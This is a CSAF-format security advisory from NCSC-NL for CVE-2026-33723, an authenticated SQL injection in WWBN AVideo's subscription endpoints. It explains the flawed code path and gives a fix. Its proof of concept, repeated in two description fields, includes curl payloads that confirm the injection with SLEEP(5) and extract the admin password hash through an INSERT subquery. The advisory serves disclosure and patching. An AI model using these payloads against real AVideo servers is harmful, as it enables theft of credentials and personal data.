{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or its being kept up to date in real time. NCSC-NL neither controls nor guarantees the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or the inability to use the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33723",
        "tracking": {
            "current_release_date": "2026-03-26T00:45:20.478175Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33723",
            "initial_release_date": "2026-03-24T13:52:44.069989Z",
            "revision_history": [
                {
                    "date": "2026-03-24T13:52:44.069989Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T13:52:55.323036Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-24T14:25:31.074361Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T14:25:38.567824Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T20:56:55.815290Z",
                    "number": "5",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-24T20:56:59.125673Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T21:37:15.566602Z",
                    "number": "7",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-24T21:37:34.795444Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T19:29:00.030087Z",
                    "number": "9",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-25T19:29:06.782405Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T23:16:44.566494Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-25T23:16:46.913491Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T00:44:52.357285Z",
                    "number": "13",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (3).| CWES updated (1)."
                }
            ],
            "status": "interim",
            "version": "13"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<=26.0",
                                "product": {
                                    "name": "vers:unknown/<=26.0",
                                    "product_id": "CSAFPID-5893889",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "AVideo"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.4",
                                "product": {
                                    "name": "vers:unknown/10.4",
                                    "product_id": "CSAFPID-5656122",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.8",
                                "product": {
                                    "name": "vers:unknown/10.8",
                                    "product_id": "CSAFPID-5656123",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11",
                                "product": {
                                    "name": "vers:unknown/11",
                                    "product_id": "CSAFPID-5656124",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1",
                                "product": {
                                    "name": "vers:unknown/11.1",
                                    "product_id": "CSAFPID-5656125",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1.1",
                                "product": {
                                    "name": "vers:unknown/11.1.1",
                                    "product_id": "CSAFPID-5656126",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.5",
                                "product": {
                                    "name": "vers:unknown/11.5",
                                    "product_id": "CSAFPID-5656127",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.6",
                                "product": {
                                    "name": "vers:unknown/11.6",
                                    "product_id": "CSAFPID-5656128",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/12.4",
                                "product": {
                                    "name": "vers:unknown/12.4",
                                    "product_id": "CSAFPID-5656129",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@12.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3",
                                "product": {
                                    "name": "vers:unknown/14.3",
                                    "product_id": "CSAFPID-5656130",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3.1",
                                "product": {
                                    "name": "vers:unknown/14.3.1",
                                    "product_id": "CSAFPID-5656131",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.4",
                                "product": {
                                    "name": "vers:unknown/14.4",
                                    "product_id": "CSAFPID-5656132",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/18.0",
                                "product": {
                                    "name": "vers:unknown/18.0",
                                    "product_id": "CSAFPID-5656133",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@18.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/21.0",
                                "product": {
                                    "name": "vers:unknown/21.0",
                                    "product_id": "CSAFPID-5721197",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@21.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/22.0",
                                "product": {
                                    "name": "vers:unknown/22.0",
                                    "product_id": "CSAFPID-5772271",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@22.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/24.0",
                                "product": {
                                    "name": "vers:unknown/24.0",
                                    "product_id": "CSAFPID-5772272",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@24.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/25.0",
                                "product": {
                                    "name": "vers:unknown/25.0",
                                    "product_id": "CSAFPID-5840723",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@25.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/26.0",
                                "product": {
                                    "name": "vers:unknown/26.0",
                                    "product_id": "CSAFPID-5878928",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@26.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<=26.0",
                                "product": {
                                    "name": "vers:unknown/>=0|<=26.0",
                                    "product_id": "CSAFPID-5878929"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "avideo"
                    }
                ],
                "category": "vendor",
                "name": "WWBN"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33723",
            "cwe": {
                "id": "CWE-89",
                "name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this->users_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST['user_id']` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts. Commit 36dfae22059fbd66fd34bbc5568a838fc0efd66c contains a patch.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33723"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this->users_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST['user_id']` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts. Commit 36dfae22059fbd66fd34bbc5568a838fc0efd66c contains a patch.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33723.json"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this->users_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST['user_id']` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts.\n\n## Details\n\nThe vulnerability exists because of a disconnect between where `intval()` is applied and where the value is used in SQL.\n\n**Entry points** — `objects/subscribe.json.php:40` and `objects/subscribeNotify.json.php:23`:\n\n```php\n// subscribe.json.php line 40\n$subscribe = new Subscribe(0, $_POST['email'], $_POST['user_id'], User::getId());\n```\n\n**Constructor stores raw value** — `objects/subscribe.php:34`:\n\n```php\npublic function __construct($id, $email = \"\", $user_id = \"\", $subscriber_users_id = \"\")\n{\n    // ...\n    $this->users_id = $user_id;  // Raw $_POST['user_id'], no sanitization\n    $this->subscriber_users_id = $subscriber_users_id;\n    if (empty($this->id)) {\n        $this->loadFromId($this->subscriber_users_id, $user_id, \"\");\n    }\n}\n```\n\n**`getSubscribeFromID` sanitizes local copies only** — `objects/subscribe.php:137-139`:\n\n```php\npublic static function getSubscribeFromID($subscriber_users_id, $user_id, $status = \"a\"){\n    $subscriber_users_id = intval($subscriber_users_id);  // Local variable only\n    $user_id = intval($user_id);  // Local variable only — $this->users_id is NOT affected\n```\n\nWhen `getSubscribeFromID` finds no matching subscription (the attacker simply targets a user_id they haven't subscribed to), `loadFromId()` returns false. 
The object's `$this->id` remains null, and `$this->users_id` retains the unsanitized injection payload.\n\n**Vulnerable sink** — `objects/subscribe.php:88`:\n\n```php\npublic function save()\n{\n    if (!empty($this->id)) {\n        // UPDATE path (not reached when $this->id is null)\n    } else {\n        $this->status = 'a';\n        $sql = \"INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) \n                VALUES ('{$this->users_id}', ...\";  // Direct concatenation of injected value\n    }\n    $saved = sqlDAL::writeSql($sql);  // Called with NO $formats or $values\n```\n\n**`sqlDAL::writeSql` provides no protection** — `objects/mysql_dal.php:102`:\n\nWhen called without `$formats`/`$values` parameters (as `save()` does), the `eval_mysql_bind()` function at line 636 returns `true` without binding any parameters. The already-concatenated SQL string is passed directly to `$global['mysqli']->prepare()` and `execute()`, executing the injection as the prepared statement itself.\n\n## PoC\n\n**Prerequisites:** An authenticated session on the target AVideo instance.\n\n**Step 1: Confirm injection with time-based blind SQLi**\n\n```bash\n# Pick a user_id that the current user has NOT subscribed to (e.g., 99999)\n# The SLEEP(5) will cause a ~5 second delay confirming injection\ncurl -s -o /dev/null -w \"%{time_total}\" \\\n  -b 'PHPSESSID=VALID_SESSION_ID' \\\n  -d \"user_id=99999'+AND+SLEEP(5)+AND+'1\" \\\n  https://target/objects/subscribe.json.php\n# Expected: ~5 second response time (vs <1 second normally)\n```\n\n**Step 2: Extract admin password hash via INSERT subquery**\n\n```bash\n# Inject a subquery that reads the admin password hash into the email column\ncurl -b 'PHPSESSID=VALID_SESSION_ID' \\\n  -d \"user_id=99999',(SELECT+pass+FROM+users+WHERE+isAdmin=1+LIMIT+1),'a','1.1.1.1',now(),now(),'1');%23\" \\\n  https://target/objects/subscribe.json.php\n```\n\nThis closes the `VALUES` clause with attacker-controlled 
data and comments out the rest of the query. The admin password hash is inserted into the `email` column of the `subscribes` table, which can be read back via the subscription list API.\n\n**Step 3: Read exfiltrated data**\n\nThe injected row is readable via any endpoint that queries the `subscribes` table and returns the `email` field (e.g., `getAllSubscribes()`).\n\nThe same attack works against `objects/subscribeNotify.json.php` via the same `user_id` parameter.\n\n## Impact\n\n- **Full database read access:** An attacker with any authenticated account can extract arbitrary data from all database tables using INSERT subqueries, including:\n  - User password hashes (`users.pass`)\n  - Admin credentials\n  - Encryption salts and API keys from configuration tables\n  - Email addresses and personal data of all users\n- **Data integrity:** The attacker can insert arbitrary rows into the `subscribes` table.\n- **Two affected endpoints:** Both `subscribe.json.php` and `subscribeNotify.json.php` pass raw `$_POST['user_id']` to the vulnerable code path.\n\n## Recommended Fix\n\nApply `intval()` to `$this->users_id` before use in the constructor, or better yet, use parameterized queries in `save()`.\n\n**Option 1 — Sanitize in constructor** (minimal fix):\n\n```php\n// objects/subscribe.php, constructor (line 34)\n- $this->users_id = $user_id;\n+ $this->users_id = intval($user_id);\n```\n\n**Option 2 — Use parameterized query in save()** (recommended):\n\n```php\n// objects/subscribe.php, save() method (lines 87-90)\npublic function save()\n{\n    global $global;\n    if (!empty($this->id)) {\n        $sql = \"UPDATE subscribes SET status = ?, notify = ?, ip = ?, modified = now() WHERE id = ?\";\n        $saved = sqlDAL::writeSql($sql, \"sssi\", [$this->status, $this->notify, getRealIpAddr(), $this->id]);\n    } else {\n        $this->status = 'a';\n        $sql = \"INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) VALUES (?, ?, 
?, ?, now(), now(), ?)\";\n        $saved = sqlDAL::writeSql($sql, \"isssi\", [intval($this->users_id), $this->email, $this->status, getRealIpAddr(), intval($this->subscriber_users_id)]);\n    }\n```\n\nOption 2 is strongly recommended as it also fixes the unsanitized `$this->email`, `$this->status`, and `getRealIpAddr()` values in both the INSERT and UPDATE paths, preventing any future injection through those fields.",
                    "title": "github - https://api.github.com/advisories/GHSA-ffr8-fxhv-fv8h"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this->users_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST['user_id']` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts.\n\n## Details\n\nThe vulnerability exists because of a disconnect between where `intval()` is applied and where the value is used in SQL.\n\n**Entry points** — `objects/subscribe.json.php:40` and `objects/subscribeNotify.json.php:23`:\n\n```php\n// subscribe.json.php line 40\n$subscribe = new Subscribe(0, $_POST['email'], $_POST['user_id'], User::getId());\n```\n\n**Constructor stores raw value** — `objects/subscribe.php:34`:\n\n```php\npublic function __construct($id, $email = \"\", $user_id = \"\", $subscriber_users_id = \"\")\n{\n    // ...\n    $this->users_id = $user_id;  // Raw $_POST['user_id'], no sanitization\n    $this->subscriber_users_id = $subscriber_users_id;\n    if (empty($this->id)) {\n        $this->loadFromId($this->subscriber_users_id, $user_id, \"\");\n    }\n}\n```\n\n**`getSubscribeFromID` sanitizes local copies only** — `objects/subscribe.php:137-139`:\n\n```php\npublic static function getSubscribeFromID($subscriber_users_id, $user_id, $status = \"a\"){\n    $subscriber_users_id = intval($subscriber_users_id);  // Local variable only\n    $user_id = intval($user_id);  // Local variable only — $this->users_id is NOT affected\n```\n\nWhen `getSubscribeFromID` finds no matching subscription (the attacker simply targets a user_id they haven't subscribed to), `loadFromId()` returns false. 
The object's `$this->id` remains null, and `$this->users_id` retains the unsanitized injection payload.\n\n**Vulnerable sink** — `objects/subscribe.php:88`:\n\n```php\npublic function save()\n{\n    if (!empty($this->id)) {\n        // UPDATE path (not reached when $this->id is null)\n    } else {\n        $this->status = 'a';\n        $sql = \"INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) \n                VALUES ('{$this->users_id}', ...\";  // Direct concatenation of injected value\n    }\n    $saved = sqlDAL::writeSql($sql);  // Called with NO $formats or $values\n```\n\n**`sqlDAL::writeSql` provides no protection** — `objects/mysql_dal.php:102`:\n\nWhen called without `$formats`/`$values` parameters (as `save()` does), the `eval_mysql_bind()` function at line 636 returns `true` without binding any parameters. The already-concatenated SQL string is passed directly to `$global['mysqli']->prepare()` and `execute()`, executing the injection as the prepared statement itself.\n\n## PoC\n\n**Prerequisites:** An authenticated session on the target AVideo instance.\n\n**Step 1: Confirm injection with time-based blind SQLi**\n\n```bash\n# Pick a user_id that the current user has NOT subscribed to (e.g., 99999)\n# The SLEEP(5) will cause a ~5 second delay confirming injection\ncurl -s -o /dev/null -w \"%{time_total}\" \\\n  -b 'PHPSESSID=VALID_SESSION_ID' \\\n  -d \"user_id=99999'+AND+SLEEP(5)+AND+'1\" \\\n  https://target/objects/subscribe.json.php\n# Expected: ~5 second response time (vs <1 second normally)\n```\n\n**Step 2: Extract admin password hash via INSERT subquery**\n\n```bash\n# Inject a subquery that reads the admin password hash into the email column\ncurl -b 'PHPSESSID=VALID_SESSION_ID' \\\n  -d \"user_id=99999',(SELECT+pass+FROM+users+WHERE+isAdmin=1+LIMIT+1),'a','1.1.1.1',now(),now(),'1');%23\" \\\n  https://target/objects/subscribe.json.php\n```\n\nThis closes the `VALUES` clause with attacker-controlled 
data and comments out the rest of the query. The admin password hash is inserted into the `email` column of the `subscribes` table, which can be read back via the subscription list API.\n\n**Step 3: Read exfiltrated data**\n\nThe injected row is readable via any endpoint that queries the `subscribes` table and returns the `email` field (e.g., `getAllSubscribes()`).\n\nThe same attack works against `objects/subscribeNotify.json.php` via the same `user_id` parameter.\n\n## Impact\n\n- **Full database read access:** An attacker with any authenticated account can extract arbitrary data from all database tables using INSERT subqueries, including:\n  - User password hashes (`users.pass`)\n  - Admin credentials\n  - Encryption salts and API keys from configuration tables\n  - Email addresses and personal data of all users\n- **Data integrity:** The attacker can insert arbitrary rows into the `subscribes` table.\n- **Two affected endpoints:** Both `subscribe.json.php` and `subscribeNotify.json.php` pass raw `$_POST['user_id']` to the vulnerable code path.\n\n## Recommended Fix\n\nApply `intval()` to `$this->users_id` before use in the constructor, or better yet, use parameterized queries in `save()`.\n\n**Option 1 — Sanitize in constructor** (minimal fix):\n\n```php\n// objects/subscribe.php, constructor (line 34)\n- $this->users_id = $user_id;\n+ $this->users_id = intval($user_id);\n```\n\n**Option 2 — Use parameterized query in save()** (recommended):\n\n```php\n// objects/subscribe.php, save() method (lines 87-90)\npublic function save()\n{\n    global $global;\n    if (!empty($this->id)) {\n        $sql = \"UPDATE subscribes SET status = ?, notify = ?, ip = ?, modified = now() WHERE id = ?\";\n        $saved = sqlDAL::writeSql($sql, \"sssi\", [$this->status, $this->notify, getRealIpAddr(), $this->id]);\n    } else {\n        $this->status = 'a';\n        $sql = \"INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) VALUES (?, ?, 
?, ?, now(), now(), ?)\";\n        $saved = sqlDAL::writeSql($sql, \"isssi\", [intval($this->users_id), $this->email, $this->status, getRealIpAddr(), intval($this->subscriber_users_id)]);\n    }\n```\n\nOption 2 is strongly recommended as it also fixes the unsanitized `$this->email`, `$this->status`, and `getRealIpAddr()` values in both the INSERT and UPDATE paths, preventing any future injection through those fields.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-ffr8-fxhv-fv8h.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00019",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.3",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Is related to (a version of) an uncommon product, The value of the most recent EPSS score, The value of the most recent CVSS (V3) score, There is exploit data available from source Nvd",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5893889",
                    "CSAFPID-5656122",
                    "CSAFPID-5656123",
                    "CSAFPID-5656124",
                    "CSAFPID-5656125",
                    "CSAFPID-5656126",
                    "CSAFPID-5656127",
                    "CSAFPID-5656128",
                    "CSAFPID-5656129",
                    "CSAFPID-5656130",
                    "CSAFPID-5656131",
                    "CSAFPID-5656132",
                    "CSAFPID-5656133",
                    "CSAFPID-5721197",
                    "CSAFPID-5772271",
                    "CSAFPID-5772272",
                    "CSAFPID-5840723",
                    "CSAFPID-5878928",
                    "CSAFPID-5878929"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33723"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33723.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-ffr8-fxhv-fv8h"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-ffr8-fxhv-fv8h.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33723"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-ffr8-fxhv-fv8h"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
                        "baseScore": 7.1,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5656122",
                        "CSAFPID-5656123",
                        "CSAFPID-5656124",
                        "CSAFPID-5656125",
                        "CSAFPID-5656126",
                        "CSAFPID-5656127",
                        "CSAFPID-5656128",
                        "CSAFPID-5656129",
                        "CSAFPID-5656130",
                        "CSAFPID-5656131",
                        "CSAFPID-5656132",
                        "CSAFPID-5656133",
                        "CSAFPID-5721197",
                        "CSAFPID-5772271",
                        "CSAFPID-5772272",
                        "CSAFPID-5840723",
                        "CSAFPID-5878928",
                        "CSAFPID-5878929",
                        "CSAFPID-5893889"
                    ]
                }
            ],
            "title": "CVE-2026-33723"
        }
    ]
}